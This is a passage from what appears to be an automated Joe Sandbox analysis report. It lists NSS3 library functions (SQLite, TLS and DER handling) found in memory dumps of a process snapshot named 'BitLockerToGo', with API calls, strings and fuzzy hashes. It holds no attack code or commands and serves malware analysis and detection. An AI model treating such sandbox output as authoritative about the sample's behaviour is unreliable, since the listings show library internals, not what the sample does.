                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C642CDA,?,00000000), ref: 6C642E1E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C649003,?), ref: 6C69FD91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: PORT_Alloc_Util.NSS3(A4686C6A,?), ref: 6C69FDA2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C6A,?,?), ref: 6C69FDC4
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(?), ref: 6C642E33
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FD80: free.MOZGLUE(00000000,?,?), ref: 6C69FDD1
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C642E4E
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C642E5E
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?), ref: 6C642E71
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableRemove.NSS3(?), ref: 6C642E84
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableAdd.NSS3(?,00000000), ref: 6C642E96
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C642EA9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C642EB6
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C642EC5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2de149f2d8213acbfc5b5fb809cd5f0a52989aa6fe72825352161c2050b148fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ec6c59b96d6d0d954aceab536ecc01517504e7e7140874cdc7174801571501f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2de149f2d8213acbfc5b5fb809cd5f0a52989aa6fe72825352161c2050b148fe
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E721F572A00101A7EF001A66EC49E9B3B75AB9234DF148030ED1CC6711FB32C559D6A9
                                                                                                                                                                                                                                                                                                                                                          Function 6C62FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C62FD18
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C62FD5F
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C62FD89
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C62FD99
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C62FE3C
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C62FEE3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C62FEEE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                                                                                                                                                                                                                                                                                                                          • String ID: simple
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1130978851-3246079234
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ea96bb3437583e11064b65585cbfe1b2780d4193f936dcbde4538dfab934f294
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a133d345fd7e1127adff0fb234ffd599c542d6b58be0433807655579703907ae
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ea96bb3437583e11064b65585cbfe1b2780d4193f936dcbde4538dfab934f294
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75917FB0A012159FDB04CF55C980AAAB7F1FF85318F24856DD8199BB52D739E802CF96
                                                                                                                                                                                                                                                                                                                                                          Function 6C635CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C635EC9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C635EED
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C635EE0
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C635ED1
                                                                                                                                                                                                                                                                                                                                                          • unable to close due to unfinalized statements or unfinished backups, xrefs: 6C635E64
                                                                                                                                                                                                                                                                                                                                                          • invalid, xrefs: 6C635EBE
                                                                                                                                                                                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C635EC3
                                                                                                                                                                                                                                                                                                                                                          • misuse, xrefs: 6C635EDB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 632333372-1982981357
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 25f67b5e23807918eb7149a4f818d3509fd8b0a2ade6335121deff95732cf09d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 54512d5836e25b55c9bbcbba7696b6745592ac0435129d85e47e902009cd8d4e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25f67b5e23807918eb7149a4f818d3509fd8b0a2ade6335121deff95732cf09d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3981B270B056219BEB1A8F55C848BAAB7B0BF41318F18326DD81D5BB51C730E842CBDD
                                                                                                                                                                                                                                                                                                                                                          Function 6C61DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61DDF9
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C61DE68
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C61DE97
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C61DEB6
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C61DF78
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1526119172-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: c6dd3a194e97004d3f711174ff1bdf01aa9e24b5806d9e8abf20bbd5554cb93a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3da7c03cd2afa5e89ba896529ee1dd11de26f26b2ec586a067b0750263541e18
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6dd3a194e97004d3f711174ff1bdf01aa9e24b5806d9e8abf20bbd5554cb93a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9981B371B083009FD715CF29C884B6A77F1BF85309F14882DE99A8BE51EB31E946CB56
                                                                                                                                                                                                                                                                                                                                                          Function 6C5CCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5CB999), ref: 6C5CCFF3
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C5CB999), ref: 6C5CD02B
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C5CB999), ref: 6C5CD041
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C5CB999), ref: 6C71972B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: sqlite3_log$_byteswap_ushort
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 491875419-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3d255b9dad313f9adad0d426ed4d65f84706c303288bcb6795674fe32328fc0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 307dc101af6dfeae7ea91fdf6266452a9c6fd9b2f3f357b6a11ac666c85badb7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d255b9dad313f9adad0d426ed4d65f84706c303288bcb6795674fe32328fc0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68615771A042108BD310CF69CD01BA6B7F5EF95318F2845ADE4499FB82E376E947CBA1
                                                                                                                                                                                                                                                                                                                                                          Function 6C6A4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C6A536F,00000022,?,?,00000000,?), ref: 6C6A4E70
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(00000000), ref: 6C6A4F28
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C6A4F8E
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C6A4FAE
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A4FC8
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: R_smprintf$Alloc_Utilfreeisspace
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s=%c%s%c$%s=%s$oSjl"
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2709355791-1702272930
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fca9a81ba8523aca14dbc08f4daa21050ff7d0da49dcbc0711d9b0c024476b13
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cd93809e97a77ff5e94d76bc536f8dfe66d09dc4e4d69f3e3a7436639b7db898
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fca9a81ba8523aca14dbc08f4daa21050ff7d0da49dcbc0711d9b0c024476b13
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53517E31A041458BEF01CAE9CC507FF7BF5BF46348F18A125E890A7A41DB759C078799
                                                                                                                                                                                                                                                                                                                                                          Function 6C6CEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEF6D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEFE4
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CEFF1
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,6C6EA4A1,?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CF00B
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C6EA4A1,?,00000000,?,00000001), ref: 6C6CF027
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonlmemcpy$ErrorValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: dtls13
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 242828995-1883198198
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d5296a2db130c967a5db4ecd286b1dbd4e2043d3c937e944fdbccb9070be444
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e4bce2e3c20e294c0b95e4973ef0b5de3b8f2debd473e4908088b73d889c0ab
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d5296a2db130c967a5db4ecd286b1dbd4e2043d3c937e944fdbccb9070be444
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3311271B01215AFC710DF28CC85B8AB7F4EF49348F258029E8289B751E731E915CBEA
                                                                                                                                                                                                                                                                                                                                                          Function 6C64AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C64AFBE
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C769500,6C643F91), ref: 6C64AFD2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C64B007
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C696A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C641666,?,6C64B00C,?), ref: 6C696AFB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE009,00000000), ref: 6C64B02F
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C64B046
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C64B058
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C64B060
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
                                                                                                                                                                                                                                                                                                                                                          • String ID: security
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3627567351-3315324353
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 40e8d7fa4de44c443b7ae22d3f810b1015a3f659f55d2eafa6d452b91399b37b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5e873ee112b951a4dc370f0a9f1c2204f6de72b4445150247f293101e45effbc
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40e8d7fa4de44c443b7ae22d3f810b1015a3f659f55d2eafa6d452b91399b37b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A231F4705043009BDB208F28D844BAE77A4AFC6B6EF14C619E9745BBD1E332954AC79E
                                                                                                                                                                                                                                                                                                                                                          Function 6C68CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000100,?), ref: 6C68CD08
                                                                                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C68CE16
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68D079
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
